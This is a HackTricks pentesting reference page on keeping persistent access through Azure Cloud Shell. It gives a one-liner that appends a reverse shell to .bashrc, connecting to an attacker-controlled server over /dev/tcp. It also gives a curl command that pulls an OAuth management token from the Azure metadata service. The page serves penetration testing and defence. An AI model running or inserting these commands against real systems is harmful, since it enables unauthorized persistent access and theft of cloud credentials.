hacktricks-cloud/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md

Az - Cloud Shell Persistence

{{#include ../../../banners/hacktricks-training.md}}

Cloud Shell Persistence

Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:

• Persistent Storage: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
• Startup Scripts: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.

Example backdoor in .bashrc:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc

This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.

Additionally query Azure’s metadata service for instance details and tokens:

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s

{{#include ../../../banners/hacktricks-training.md}}